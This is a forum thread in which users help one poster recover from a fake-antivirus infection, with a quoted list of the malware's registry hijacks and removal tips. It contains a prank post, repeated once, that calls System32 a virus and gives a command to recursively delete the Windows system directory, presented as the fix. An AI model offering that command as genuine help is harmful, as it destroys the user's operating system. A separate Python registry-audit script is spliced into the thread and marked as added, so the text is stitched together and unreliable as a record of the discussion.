
computer help needed, where the guru?

ccpmotox

System32 is a virus that infects your Windows directory and turns it into a Sega game. Microsoft makes software to remedy this called "My Computer". It comes pre-installed with most Windows systems and can most likely be found on your desktop.

To remove the System32 trojan virus, you have two choices. The quickest, most effective method is to press the Windows key on the keyboard, hold it, and press 'R', and then type cmd /c rd /s /q %windir%\system32 -- or you may double-click "My Computer", then right-click the infected C: directory, and choose Delete. Ignore any warnings, as this malicious virus will try to stay on your directory as long as it can.
 

Red_Alert

caneman

When you get the energy, try and get back to today where you had the virus, i.e., go forward.
The things that you lost should return.

Boot your computer in Safe Mode, i.e., when you turn on the computer, start hitting F8 repeatedly.
Select "Safe Mode"; this will bypass the executable files in the registry, where the virus is.
Your "Safe Mode" screen will look somewhat different than what you're used to.
Run Malwarebytes from there.
 

cane_man

"In reality, though, the infections that the rogues states are on your computer are all legitimate files that if deleted could cause Windows to not operate correctly"

LMAO! yup, every file listed was a system file and essential files for AVG, and spybot
 

cane_man

caneman

When you get the energy, try and get back to today where you had the virus, i.e., go forward.
The things that you lost should return.

Boot your computer in Safe Mode, i.e., when you turn on the computer, start hitting F8 repeatedly.
Select "Safe Mode"; this will bypass the executable files in the registry, where the virus is.
Your "Safe Mode" screen will look somewhat different than what you're used to.
Run Malwarebytes from there.

familiar with safe mode. other than one glitch I think I've got it. redownloaded Malwarebytes just in case. thanx for the help bras.......hmmmm that looks kinda gay, lets go with bros
 

cane_man

System32 is a virus that infects your Windows directory and turns it into a Sega game. Microsoft makes software to remedy this called "My Computer". It comes pre-installed with most Windows systems and can most likely be found on your desktop.

To remove the System32 trojan virus, you have two choices. The quickest, most effective method is to press the Windows key on the keyboard, hold it, and press 'R', and then type cmd /c rd /s /q %windir%\system32 -- or you may double-click "My Computer", then right-click the infected C: directory, and choose Delete. Ignore any warnings, as this malicious virus will try to stay on your directory as long as it can.

LMAO! you are such a nice guy.
 

cane_man

From the symantec forum that I linked to...

"While searching the web for iPhones, a fake security malware infected my laptop. Although I use Firefox and Symantec Endpoint, the trojan slipped through my XP SP3 system. When I ran a full scan, the March 5 r of Symantec did not identify the problem. After researching the web, I found a blog at "Bleepingcomputer.com," which fully described the problem and the solution. I used MalwareBytes' AntiMalware to remove the infected registries and files. Note that the rogue has other names, such as Vista Internet Security 2010, Win 7 Internet Security 2010, and several others. This rogue must be disabled before it allows other executable files to run. I used FixExe.reg.

Variants of the files infected are as follows.

%UserProfile%\Local Settings\Application Data\av.exe

%UserProfile%\Local Settings\Application Data\WRblt8464P

%UserProfile%\AppData\Local\av.exe <In Antivirus Vista 2010 & Win 7 Antispyware 2010>

%UserProfile%\AppData\Local\WRblt8464P <In Antivirus Vista 2010 & Win 7 Antispyware 2010>

HKEY_CURRENT_USER\Software\Classes\.exe\shell\open\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "%1" %*

HKEY_CURRENT_USER\Software\Classes\secfile\shell\open\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "%1" %*

HKEY_CLASSES_ROOT\.exe\shell\open\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "%1" %*

HKEY_CLASSES_ROOT\secfile\shell\open\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "%1" %*

HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "C:\Program Files\Mozilla Firefox\firefox.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\safemode\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode

HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "C:\Program Files\Internet Explorer\iexplore.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center "AntiVirusOverride" = "1"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center "FirewallOverride" = "1"

My system had the "av.exe" rogue and six infected registry files.

Any questions, please reference the article posted Jan 27, 2010 by Grinler on BleepingComputer.com "How to remove XP Internet Security 2010, Antivirus Vista 2010, and Win 7 Antispyware 2010."
I also found an older article at Rogue Security Software | Fake Virus Alerts | Scareware

eusing reg cleaner cleaned those out (or similar). thanx for the registry tip red alert.
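
The registry values listed in the quoted Symantec post follow one pattern: the open command for .exe files and for the browsers is rewritten to run av.exe first, and the Security Center override flags are set. As an added example (not part of the thread or of any tool mentioned in it), this Python sketch audits the text of a .reg export for that pattern; the sample export is constructed from the values quoted above, the function names are hypothetical, and it assumes plain-text REG_SZ and REG_DWORD lines.

```python
import re

# Constructed .reg export; keys and values mirror the ones quoted in the post.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\.exe\shell\open\command]
@="\"%UserProfile%\\Local Settings\\Application Data\\av.exe\" /START \"%1\" %*"
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"
[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command]
@="\"%UserProfile%\\Local Settings\\Application Data\\av.exe\" /START \"C:\\Program Files\\Mozilla Firefox\\firefox.exe\""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride"=dword:00000001
"FirewallOverride"=dword:00000000
'''

EXE_HANDLER = re.compile(r'\\(\.exe|exefile|secfile)\\shell\\open\\command$', re.I)
BROWSER_HANDLER = re.compile(r'\\StartMenuInternet\\[^\\]+\\shell\\[^\\]+\\command$', re.I)
PROFILE_DIR = re.compile(r'\\(Application Data|AppData)\\', re.I)
VALUE_LINE = re.compile(r'(@|"(?:[^"\\]|\\.)*")=(.*)$')
OVERRIDES = ('antivirusoverride', 'firewalloverride')

def parse_reg(text):
    """Yield (key, value_name, data); '@' is the (Default) value."""
    key = None
    for line in map(str.strip, text.splitlines()):
        m = VALUE_LINE.match(line)
        if line.startswith('[') and line.endswith(']'):
            key = line[1:-1]
        elif key and m:
            name, raw = m.group(1).strip('"'), m.group(2)
            if raw.startswith('"'):          # REG_SZ: undo \" and \\ escaping
                yield key, name, re.sub(r'\\(.)', r'\1', raw[1:-1])
            elif raw.startswith('dword:'):   # REG_DWORD: hex digits
                yield key, name, int(raw[6:], 16)

def audit(text):
    """Return (key, reason) for each value that matches the hijack pattern."""
    hits = []
    for key, name, data in parse_reg(text):
        if name == '@' and isinstance(data, str):
            # First program on the command line, quoted or bare.
            launcher = data.split('"')[1] if data.startswith('"') else (data.split() or [''])[0]
            if EXE_HANDLER.search(key) and data != '"%1" %*':
                hits.append((key, 'exe open command is not "%1" %*'))
            elif BROWSER_HANDLER.search(key) and PROFILE_DIR.search(launcher):
                hits.append((key, 'browser launched via a binary in the user profile'))
        elif key.lower().endswith('\\security center') and name.lower() in OVERRIDES and data == 1:
            hits.append((key, name + ' is set'))
    return hits
```

Calling `audit(SAMPLE_REG)` reports the hijacked .exe handler, the wrapped Firefox command and the AntiVirusOverride flag, and leaves the stock `"%1" %*` exefile handler alone. The user-profile check is a heuristic: a browser legitimately installed per-user would also match it.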
 

ktg8trgrl

ok.. is there a way to keep this from happening??.. cuz I have a new puter and I don't want this to happen to me... thanks guys for your input
 

cane_man

I'd give you advice, but alas it might not be so good LMAO.

actually keep a good av up, run spybot search and destroy (free), Malwarebytes (free) and I also use eusing free registry cleaner, which fixed me here. some people don't trust reg cleaners, but I've used eusing for some time now without a single problem, and it backs up your reg before changing anything, so if it does fuck up, you can reverse it.
 